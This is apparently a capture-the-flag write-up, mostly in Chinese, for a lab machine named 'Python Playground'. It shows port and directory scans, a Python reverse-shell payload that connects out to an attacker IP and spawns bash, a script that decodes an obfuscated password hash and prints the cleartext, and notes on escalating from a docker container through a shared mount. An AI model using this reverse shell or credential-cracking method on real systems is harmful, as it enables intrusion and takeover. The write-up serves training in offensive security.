Python Playground
端口扫描
root@ip-10-10-149-250:~/pythonplayground# nmap -sTCV -p- --min-rate 1000 10.10.250.38
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-06 15:02 GMT
Nmap scan report for ip-10-10-250-38.eu-west-1.compute.internal (10.10.250.38)
Host is up (0.0036s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f4:af:2f:f0:42:8a:b5:66:61:3e:73:d8:0d:2e:1c:7f (RSA)
| 256 36:f0:f3:aa:6b:e3:b9:21:c8:88:bd:8d:1c:aa:e2:cd (ECDSA)
|_ 256 54:7e:3f:a9:17:da:63:f2:a2:ee:5c:60:7d:29:12:55 (EdDSA)
80/tcp open http Node.js Express framework
|_http-title: Python Playground!
MAC Address: 02:A4:72:EB:8E:AD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
80
root@ip-10-10-149-250:~/pythonplayground# gobuster dir -u http://10.10.250.38/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.250.38/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt
[+] Timeout: 10s
===============================================================
2023/11/06 15:11:25 Starting gobuster
===============================================================
/index.html (Status: 200)
/login.html (Status: 200)
/signup.html (Status: 200)
/admin.html (Status: 200)
===============================================================
2023/11/06 15:16:50 Finished
===============================================================
访问主页面内容, 这是一个 SSTI 的靶机, 接着查看登陆和注册页面我发现已经不允许登陆, 之后访问 admin.html 页面, 我发现其中是基于前端校验的, 从下面的代码可以看出如果密码正确其应该等于这个 hash 值, 同时当我们登陆成功重定向到另一个页面, 估计这里就是 SSTI 的位置了
从上面可以看出这是一个 python 框, 可以执行命令 ,
后渗透
root(docker)
从上面来看可以借此来获取一个 Shell
socket = __import__("socket")
subprocess = __import__("subprocess")
os = __import__("os")
pty = __import__("pty")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.99.12",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/bash")
root(docker) —> connor(172.17.0.1)
在之前获取到 admin.html 页面是前端校验, 在哪里获取到一个 hash 值, 因此可以尝试将其逆向, 得到原文来进行 connor 用户登陆
hash = "dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu"
#Strings to Integer Array
def rev_int_to_str(temp):
strs = []
for i in temp:
strs.append(ord(i)-97)
return strs
#Integer Array to strings
def rev_str_to_int(temp):
strs = ""
for i in range(0,len(temp)-1,2):
temp2 = 0
temp2 = int(temp[i]*26)
temp2 += int(temp[i+1])
strs += chr(temp2)
return strs
password = rev_str_to_int(rev_int_to_str(rev_str_to_int(rev_int_to_str(hash))))
print(password)
# spaghetti1245
connor(172.17.0.1) —> root(172.17.0.1)
查看进程信息可以发现 docker 环境是 root 用户启动的
基于此可以尝试查看挂载信息, 发现
(remote) root@playgroundweb:/# mount
/dev/xvda2 on /mnt/log type ext4 (rw,relatime,data=ordered)
/dev/xvda2 on /etc/resolv.conf type ext4 (rw,relatime,data=ordered)
/dev/xvda2 on /etc/hostname type ext4 (rw,relatime,data=ordered)
/dev/xvda2 on /etc/hosts type ext4 (rw,relatime,data=ordered)
通过查看我发现这个目录是共享目录因此可以利用此来进行提权
